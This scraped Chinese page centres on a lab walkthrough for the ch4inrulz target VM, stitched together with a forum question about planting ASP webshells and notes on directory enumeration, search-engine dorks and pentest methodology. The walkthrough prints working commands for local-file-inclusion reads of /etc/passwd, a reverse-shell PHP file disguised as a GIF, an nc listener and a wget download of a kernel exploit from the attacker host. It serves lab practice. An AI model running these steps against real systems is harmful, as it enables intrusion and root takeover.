做渗透测试工程师时怎么测试一个网站有没有备份文件泄露

DirBuste Web服务器目录文件探测工具
网络安全工具
网络安全教程
网络资源共享
文章总数1707 篇
评论留言617 条
分类目录7 个
文章标签4943 个
友情链接21 个
网站运行216 天
浏览总量1046351 次
最后更新日
网络安全文章推荐
验证码 3 + 3 = ?
记住我的登录信息
点击“立即注册”转到会员注册页面。
若邮件延迟请耐心等待
电子邮件地址
验证码 18 + 1 = ?记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华
大家好,从本篇文章开始,我将做一个靶机渗透实战系列,废话不多说,直奔主题,我们今天的靶机是ch4inrulz,靶机下载地址在。这次靶机实战的目的是获取root权限并入读flag中的信息。本次实验难度适中,没有缓冲区溢出漏洞,也不需要我们进行exp编写,但是也能让我们进行一些思考。首先说下这个靶机渗透的几个步骤:1.& & & &端口扫面和确定IP地址2.& & & &80端口目录遍历3.& & & &8011端口目录遍历4.& & & &寻找LFI漏洞5.& & & &发现HTML备份文件6.& & & &破解密码hash7.& & & &登录开发页面8.& & & &上传伪装成GIF图片的PHP shell9.& & & &绕过检查,利用LFI漏洞获取nc shell10.& &提权并获取flag信息好了,现在开始搞事情首先,按照常规套路,使用netdiscover工具进行网络扫描来发现靶机的IP地址。在我这个例子中,IP是192.168.1.103,如图:找到IP之后,我们就用nmap来进行端口扫描可以看到开放了21,22,80,8011端口。既然开了80端口,那我们就用浏览器访问以下,可以看到一个主页,看起来像是一份简历,如图:探索一番,没有发现什么东西,那我们就进行目录遍历,这里使用kali自带的dirb工具,如图:发现了robots.txt文件,不过也没有什么东西。另外一个目录是/development,这个目录有点意思,访问这个目录,弹框要求进行身份验证,应该是一个测试页面。因为我们现在没有凭证,所以只能先放着,看看一会儿是否会有收获。我们再来看看8011端口,直接访问主页也没什么东西,好像是一个后端开发部署页面,如图:我们还是用dirb进行目录遍历,如图:发现了一个/api目录,凭经验,这个目录肯定有线索,直接访问,得到如下内容:把这几个目录挨个访问以下,发现只有files_api.php有用,访问后内得到如下页面:意思就是没有传递file参数。这么一说,很明显是要我们传递file参数,那我们直接在URL后面添加file参数,请求URL如下:192.168.1.103:8011/api/files_api.php?file=/etc/passwd结果如图:然而并没有卵用,显示输入错误,还把IP给记录下来了。通常情况下,既然get方式传参不行,那我们试一下post传参,我们使用curl工具来实现,命令如下:curl – X POST –d &file=/etc/passwd& 可以看到,我们读取到了/etc/passwd,证明存在LFI本地包含漏洞。针对这个LFI漏洞,我们尝试了一些方法,但是都无果。同时,有个现象引起了我的注意,就是这个开发服务器。有一个开发页面,一个开发服务器,肯定不止一个HTML文件,所以大胆猜测它应该有HTML备份文件,通常HTML备份文件都是index.html.bak,我们尝试去访问以下,弹出了一个下载页,哈哈,瞎猫碰上了死耗子。我们将它保存下来,并且用cat命令读取内容:太好了,可以看到存在密码hash,那还等什么,赶紧把hash值拷到hash.txt文件中,然后用John the Ripper进行破解:破解出来是frank:frank!!!这应该就是/development弹框时的用户名和密码了,我们登录试试:果不其然,我们登录进来了,如图:页面信息告诉我们,这个上传工具只完成了一半,那我们进入这个uploader看看,如图:竟然是一个文件上传页,这里对文件上传类型做了限制,只允许上传jpg,png和gif,文件大小也做了限制。看看如何来绕过限制?我是这么做的,切换到kali自带的webshell目录下,也就是/usr/share/webshells/php,找到php反弹shell的文件php-reverse-shell.php,用编辑器打开该文件,在文件第一行插入gif图标志GIF98,并且保存为shell.gif图片格式,如图:这么做就可以让uploader验证机制认为这是一个正常的图片,而实际上,却是PHP反弹shell文件。现在我们便使用uploader将图片上传到服务器,收到如下响应:信息表明,文件已经成功上传到我的uploads路径下。现在我们把目前收集到的信息小小总结回顾一下:网站名:Frank’s websiteUploader名:Frank uploader网站第一条信息:I love patterns这里猜测上传路径花了一些时间,不过最后还是猜出来了,上传目录应该就是frank uploads。但是具体的大小写并不清楚,所以我们尝试了很多遍,如Frankupload,frankUploads,franksuploads等等,最后试出来的是FRANKuploads。这一步笔记枯燥也很费时间,但是也没有别的办法能够直接爆出路径,现在我们访问这个路径来看下:现在万事具备,只欠触发这个伪装成gif的PHP后门。直接访问肯定是没用的,我们还是通过curl这个工具来发起请求:curl –X POST –d &file=/var/www/development/uploader/FRANKuploads/shell.gif& http://192.168.1.103:8011/api/files_api.php同时,我们在本机使用nc监听1234端口(跟反弹shell的PHP文件保持一样),如图:nc -lvp 1234一旦curl触发LFI漏洞,向shell.gif发起请求,很快我们就获得了一个nc会话!如图所示,我们用id命令来查看用户信息,并且使用了python命令来进入服务器的bash shell,Python –c 'pty.spawn(&/bin/bash&);'进入到服务器的shell后,我们使用uname –a命令来查看下系统内核版本,如上图可以看出版本是Linux2.6.35,Google一下可以知道这个版本存在漏洞,对应的提权exp是15285.c。我们在kali中利用searchsploit工具搜索一下这个exp,然后执行下列操作:searchsploit 15285cd Desktopcp /usr/share/exploitdb/exploits/linux/local/15285.c& .python –m SimpleHTTPServer 80这几条命令的意思是,搜索15285这个exp,切换到桌面,将exp拷贝到桌面,然后以桌面为网站绝对路径开启HTTP服务。接着,在我们刚刚利用nc获取到的shell中来下载这个exp,也就是下载到目标机上,编译exp并执行,得以提权成功,执行的命令如下:cd tmpwget http://192.168.1.107/15285.cgcc 15285.c –o 15285chmod 777 15285./15285执行之后我们便获得了root权限,cd到root,便可以看到flag文件,读取到flag文件内容,如图:本次靶机实验到此结束,各位白帽子们也可以下载靶机玩耍。
阅读:15289 | 评论:0 | 标签:
想收藏或者和大家分享这篇好文章→
关注公众号hackdig,学习最新黑客技术没有数据库备份的asp网站传大马 小弟在学渗透 跪求大神请教我如何通过后台安放asp大马和一句话木马_百度知道
没有数据库备份的asp网站传大马 小弟在学渗透 跪求大神请教我如何通过后台安放asp大马和一句话木马
答题抽奖
首次认真答题后
即可获得3次抽奖机会,100%中奖。
<span class="wgt-replyer-all-uname
" data-href="https://zhidao.baidu.com/usercenter?uid=301f05e099818
<span class="wgt-replyer-all-card-name3 wgt-replyer-all-card-names" data-href="https://zhidao.baidu.com/usercenter?uid=301f05e099818
采纳数:765
获赞数:1860
最好拿到ftp吧。做坏事是没人教你的。当然,如果是自己的网站,又拿不到ftp,可以试下文件上传接口有没有漏洞。
谢谢哈 上网查的自己解决了 是在虚拟机上做的实验 不是做坏事 哈哈
为你推荐:
其他类似问题
个人、企业类
违法有害信息,请在下方选择后提交
色情、暴力
我们会通过消息、邮箱等方式尽快将举报结果通知您。http://blog.csdn.net/shantikai/article/details/?ref=myread
、分析目标网站内容及功能
(1)首先确定网站采用何种语言编写或者是否有混用的情况此处可以通过查看网站源文件观察网站链接捕获提交请求等方式获取。
(2)爬行网站目录使用工具对网站目录进行爬行可以辅助上一步让结果更加精准将爬行结果存档如果可以此处应分析出网站是否使用通用程序如果是记录下来;进行下一步。
(3)根据上一步的爬行结果对网站根目录或者关键目录进行暴力目录探测如果网站为通用程序判读是否有过二次开发如非通用程序在探测到的目录中寻找关键目录及文件。
此步骤详细测试方法
1、输入并访问一些不可能存在的文件或目录名再输入并访问一些通过目录爬行已知存在的目录及文件名从而得知服务器如何处理无效资源。
2、使用网站爬行到的结果作为此步骤暴力目录探测的依据扫描关键目录或全部。
3、确定服务器如何处理文件无法找到的回应并使用关键字技术来处理这些回应从而判断有效资源及无效资源。
4、收集此步骤暴力扫描得到的结果并手工检测探测到目录的有效性。
5、重复以上步骤得到更多更关键的目录及文件。
()通过上面步骤得到一个完整的网站目录结构以及枚举到的所有目录名称文件名称及文件扩展名了解网站开发人员的命名思路确定其命名规则推测出更多的目录及文件名
此步骤详细测试方法
1.检查整个列表中的文件命名规则判读其命名依据如发现几个部分内容相同的文件名那么我们就可以尝试是否存在通常只要查看几个文件名就可以推测出网站开发人员的命名习惯根据其个人风格开发者可能采用各种命名方法如冗长式简洁式缩写式或者更加模糊的命名方式了解开发者使用的命名习惯有助于推测出尚未确定内容的准确名称。
2.有些不同内容的命名方案使用数字和日期作为标识符通过他们可以轻易推测出隐藏的内容静态页面经常采用这种命名方式。
例如的团队博客中文章里所展示的图片的文件名没有被重新定义采用了日期加数字递增的命名方案如年月号发布的文章中的图片分别为那么这些图片的路径就是此时我们在博客上发布了一篇内容加密的文章只有团队成员才知道密码但是黑客们根据博客以往发布文章的命名规则推测出了这些图片的准确地址从而通过图片内容泄漏了文章的大致概念。
3.检查所有客户端代码如及代码寻找任何隐藏了服务器端的线索以及隐藏的表单元素等认证检查注释内容往往能带给我们惊喜如部分通用程序会在网站首页放置一个通向网站管理后台的链接但网站管理人员不希望这个链接被正常访问者所得知于是将内容注释我们可以通过查看代码得知此具体地址还有大多数的管理后台中所调用的中常常会存储着后台所有功能模块的链接地址但在判断了当前用户权限后将其隐藏起来我们也可以通过直接查看代码的方式得知具体的内容还有一些开发者会在注释内容中记录一些敏感信息我多次从注释信息中得到数据库的名称甚至可以得到数据库的具体连接信息查询语句等。
4.把我们通过推测枚举出来的内容放在其他地方进行尝试。
如文件在这个目录下存在那么我们可以尝试在这个目录下尝试是否存在相同文件把所有枚举出来的文件名使用一些常规后缀来尝试访问如这个文件已知存在我们可以使用等后缀进行尝试如尝试或者添加在原有后缀基础上等这样可以帮助我们获取这些文件的未编译版本开发版本或者备份文件还可以通过网站使用的语言来推测如使用的后缀等。
5.搜索开发者使用的开发工具或者文本编辑器创建的临时文件。如的又或者这类文本编辑器的自动备份功能创建的文件被大量使用的后缀以及这样的遗留文件这些都是可能会发现重要线索的细节测试中一定不要遗漏这些步骤。
6.将上述的步骤自动化提取所有存在的文件名以及目录后缀的词干信息在所有目录下进行自动化批量探测。
7.如果通过以上步骤已经确定一种统一的命名方案那么就可以使用此命名规则在整个站点下进行测试。
8.不断重复以上步骤获取更多的关键信息根据时间及个人想象力尽情发挥
(5)利用公共信息如搜索引擎站点快照信息以及其网站所使用的程序开发商公布的一些使用文档等信息近一步获取目标站点更多信息。
1.使用几种不同的搜索引擎和网站快照来获取目标站点的索引和历史内容记录。
2.使用搞基搜索技巧如
site:www.hao123.com
(返回此目标站点被搜索引擎抓取收录的所有内容
site:www.hao123.com
返回此目标站点被搜索引擎抓取收录的包含此关键词的所有页面此处我们可以将关键词设定为网站后台管理后台密码修改密码找回等
site:www.hao123.com inurl:admin.php
(返回目标站点的地址中包含的所有页面可以使用或者其他关键词来寻找关键功能页面
link:www.hao123.com
(返回所有包含目标站点链接的页面其中包括其开发人员的个人博客开发日志或者开放这个站点的第三方公司合作伙伴等
related:www.hao123.com
(返回所有与目标站点”相似”的页面可能会包含一些通用程序的信息等
3.在搜索时不要只使用网页的搜索功能可以尝试如图片新闻等功能来定位具体信息。
4.从搜索引擎的快照中寻找一些关键信息如程序报错信息可以会泄漏网站具体路径或者一些快照中会保存一些测试用的测试信息比如说某个网站在开发了后台功能模块的时候还没给所有页面增加权限鉴别此时被搜索引擎抓取了快照即使后来网站增加了权限鉴别但搜索引擎的快照中仍会保留这些信息。
5.通过搜索引擎获取目标站点的子域名得到更多的功能如有些网站经常使用这个子域名作为其管理后台如等。
(6)收集网站开发者信息如网站的开发人员管理维护人员等在互联网上的一些信息
1.列出网站中得到的所有开发及维护人员的姓名和邮件地址及其他联系方式其中包含从网站联系功能中获取到的从或中的注释信息中得到的已经内容页面上获取到的。
2.使用上面介绍的一些高级搜索技巧查找这些人在互联网上发布的与目标站点有关的一切信息分析并发现有用的信息如我曾经在用这个方法获取某国内大型网站的开发人员的信息时竟发现他把他开发过的所有功能页面的源代码都放在一个公开的网站中可以随意下载包含了这个网站的数据库链接信息等关键内容从而导致我轻松获取到这个大型网站的权限。
1、安全测试方法学开源手册
渗透测试目的
了解入侵者可能利用的途径
1.信息不当
2.网络架构问题
3.防火墙设置问题
4.系统及应用程序的漏洞
5.系统及应用程序的设置
了解系统及网络的安全强度
1.评估同等能力的入侵者大约花...
渗透测试的8个步骤 展现一次完整的渗透测试过程及思路
发布时间:日 15:11
浏览量:1104
渗透测试这个事情不是随便拿个工具就可以做了, 要了解业务还需...
渗透测试学习笔记
-----以博客记录我的渗透笔记
0X01 什么是渗透测试?我的理解是:模拟黑客对网站或者服务器进行攻击,取得某些权限,...
汽车渗透测试方法之一威胁模型
如果你之前是从事软件领域的渗透测试,你已经很熟悉攻击面。至于其他,攻击面关系到与攻击目标相关的所有可能途径,从独立组件到那些影响整个车辆的...
CSRF是跨站伪造请求,常见攻击手段发送csrf的连接,通过伪造请求从而受害者点击后会利用受害者的身份发起这个请求。例如新增一个账号,修改用户密码等等。
CSRF攻击成功有两个必须的条件。1.被伪造...
WEB渗透技术流程
1.渗透目标
渗透网站(这里指定为www.xxx.com)
切记,在渗透之前要签订协议。
2.信息收集
建议手动检查和扫描器选择同时进行。
WebServer漏洞
Web应用漏洞
其他端口服务漏洞
23:03 (分类:网络安全)
这篇流程写的非常细,思路上很完整很全面,非常值得参考,做渗透思路要非常清晰,要不然我感觉真的容易乱,或者漏掉一些可能存在的点...
没有更多推荐了,
(window.slotbydup=window.slotbydup || []).push({
id: "5865577",
container: s,
size: "300,250",
display: "inlay-fix"一个网站的渗透测试思路,流程(给你一个网站,怎么做?)
& && & 1)信息收集
& && & a. 服务器的相关信息(真实ip,系统类型,版本,开放端口,WAF等)& && && && &&&b. 网站指纹识别(包括,cms,cdn,证书等),dns记录& && && && &&&c. whois信息,姓名,备案,邮箱,电话反查(邮箱丢社工库,社工准备等)& && && && &&&d. 子域名收集,旁站查询(有授权可渗透),C段等& && && && &&&e. google hacking针对化搜索,pdf文件,中间件版本,弱口令扫描等& && && && &&&f. 扫描网站目录结构,爆后台,网站banner,测试文件,备份等敏感文件泄漏等& && && && &&&i. 传输协议,通用漏洞,exp,github源码等
& && & 2)漏洞挖掘
& & & 1& 浏览网站,看看网站规模,功能,特点等
& && && && &&&2& 端口,弱口令,目录等扫描& && && && &&&3& XSS,SQL注入,命令注入,CSRF,cookie安全检测,敏感信息,通信数据传输,暴力破解,任意文件上传,越权访问,未授权访问,目录遍历,文件 包含,重放攻击(短信轰炸),服务器漏洞检测,最后使用漏扫工具等
3)漏洞利用 | 权限提升
& && && && &&&a) mysql提权,serv-u提权,linux内核版本提权等
4)清除测试数据 | 输出报告
& && && && &&&i 日志、测试数据的清理& && && && &&&ii 总结,输出渗透测试报告,附修复方案
& && && && &&&验证并发现是否有新漏洞,输出报告,归档
阅读(...) 评论()}

我要回帖

更多关于 渗透平衡时 的文章

更多推荐

版权声明:文章内容来源于网络,版权归原作者所有,如有侵权请点击这里与我们联系,我们将及时删除。

点击添加站长微信